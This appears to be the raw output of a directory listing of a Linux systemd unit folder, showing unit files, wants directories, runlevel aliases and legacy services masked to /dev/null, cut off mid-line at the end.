drwxr-xr-x 2 root root 4.0K Sep 24 22:08 multi-user.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 rescue.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 sockets.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 sysinit.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 timers.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 getty.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 graphical.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 local-fs.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 rc-local.service.d drwxr-xr-x 2 root root 4.0K Sep 24 22:08 user@.service.d lrwxrwxrwx 1 root root 14 Sep 5 03:59 autovt@.service -> getty@.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 bootlogs.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 bootmisc.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 checkfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 checkroot-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 checkroot.service -> /dev/null -rw-r--r-- 1 root root 1.1K Sep 5 03:59 console-getty.service -rw-r--r-- 1 root root 1.3K Sep 5 03:59 container-getty@.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 cryptdisks-early.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 cryptdisks.service -> /dev/null lrwxrwxrwx 1 root root 13 Sep 5 03:59 ctrl-alt-del.target -> reboot.target lrwxrwxrwx 1 root root 25 Sep 5 03:59 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service lrwxrwxrwx 1 root root 23 Sep 5 03:59 dbus-org.freedesktop.locale1.service -> systemd-localed.service lrwxrwxrwx 1 root root 22 Sep 5 03:59 dbus-org.freedesktop.login1.service -> systemd-logind.service lrwxrwxrwx 1 root root 25 Sep 5 03:59 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service -rw-r--r-- 1 root root 1.1K Sep 5 03:59 debug-shell.service lrwxrwxrwx 1 root root 16 Sep 5 03:59 default.target -> graphical.target -rw-r--r-- 1 root root 797 Sep 5 03:59 emergency.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 fuse.service -> /dev/null -rw-r--r-- 1 root root 2.0K Sep 5 03:59 getty@.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 halt.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 hostname.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 hwclock.service -> /dev/null -rw-r--r-- 1 root root 670 Sep 5 03:59 initrd-cleanup.service -rw-r--r-- 1 root root 830 Sep 5 03:59 initrd-parse-etc.service -rw-r--r-- 1 root root 589 Sep 5 03:59 initrd-switch-root.service -rw-r--r-- 1 root root 704 Sep 5 03:59 initrd-udevadm-cleanup-db.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 killprocs.service -> /dev/null lrwxrwxrwx 1 root root 28 Sep 5 03:59 kmod.service -> systemd-modules-load.service -rw-r--r-- 1 root root 717 Sep 5 03:59 kmod-static-nodes.service lrwxrwxrwx 1 root root 28 Sep 5 03:59 module-init-tools.service -> systemd-modules-load.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 motd.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 mountall-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 mountall.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 mountdevsubfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 mountkernfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 mountnfs-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 mountnfs.service -> /dev/null lrwxrwxrwx 1 root root 22 Sep 5 03:59 procps.service -> systemd-sysctl.service -rw-r--r-- 1 root root 609 Sep 5 03:59 quotaon.service -rw-r--r-- 1 root root 716 Sep 5 03:59 rc-local.service lrwxrwxrwx 1 root root 16 Sep 5 03:59 rc.local.service -> rc-local.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 rc.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 rcS.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 reboot.service -> /dev/null -rw-r--r-- 1 root root 788 Sep 5 03:59 rescue.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 rmnologin.service -> /dev/null lrwxrwxrwx 1 root root 15 Sep 5 03:59 runlevel0.target -> poweroff.target lrwxrwxrwx 1 root root 13 Sep 5 03:59 runlevel1.target -> rescue.target lrwxrwxrwx 1 root root 17 Sep 5 03:59 runlevel2.target -> multi-user.target lrwxrwxrwx 1 root root 17 Sep 5 03:59 runlevel3.target -> multi-user.target lrwxrwxrwx 1 root root 17 Sep 5 03:59 runlevel4.target -> multi-user.target lrwxrwxrwx 1 root root 16 Sep 5 03:59 runlevel5.target -> graphical.target lrwxrwxrwx 1 root root 13 Sep 5 03:59 runlevel6.target -> reboot.target lrwxrwxrwx 1 root root 9 Sep 5 03:59 sendsigs.service -> /dev/null -rw-r--r-- 1 root root 1.5K Sep 5 03:59 serial-getty@.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 single.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 stop-bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 stop-bootlogd-single.service -> /dev/null -rw-r--r-- 1 root root 554 Sep 5 03:59 suspend-then-hibernate.target -rw-r--r-- 1 root root 724 Sep 5 03:59 systemd-ask-password-console.service -rw-r--r-- 1 root root 752 Sep 5 03:59 systemd-ask-password-wall.service -rw-r--r-- 1 root root 752 Sep 5 03:59 systemd-backlight@.service -rw-r--r-- 1 root root 999 Sep 5 03:59 systemd-binfmt.service -rw-r--r-- 1 root root 537 Sep 5 03:59 systemd-exit.service -rw-r--r-- 1 root root 551 Sep 5 03:59 systemd-fsckd.service -rw-r--r-- 1 root root 540 Sep 5 03:59 systemd-fsckd.socket -rw-r--r-- 1 root root 714 Sep 5 03:59 systemd-fsck-root.service -rw-r--r-- 1 root root 715 Sep 5 03:59 systemd-fsck@.service -rw-r--r-- 1 root root 584 Sep 5 03:59 systemd-halt.service -rw-r--r-- 1 root root 671 Sep 5 03:59 systemd-hibernate-resume@.service -rw-r--r-- 1 root root 541 Sep 5 03:59 systemd-hibernate.service -rw-r--r-- 1 root root 1.1K Sep 5 03:59 systemd-hostnamed.service -rw-r--r-- 1 root root 818 Sep 5 03:59 systemd-hwdb-update.service -rw-r--r-- 1 root root 559 Sep 5 03:59 systemd-hybrid-sleep.service -rw-r--r-- 1 root root 551 Sep 5 03:59 systemd-initctl.service -rw-r--r-- 1 root root 686 Sep 5 03:59 systemd-journald-audit.socket -rw-r--r-- 1 root root 1.6K Sep 5 03:59 systemd-journald.service -rw-r--r-- 1 root root 771 Sep 5 03:59 systemd-journal-flush.service -rw-r--r-- 1 |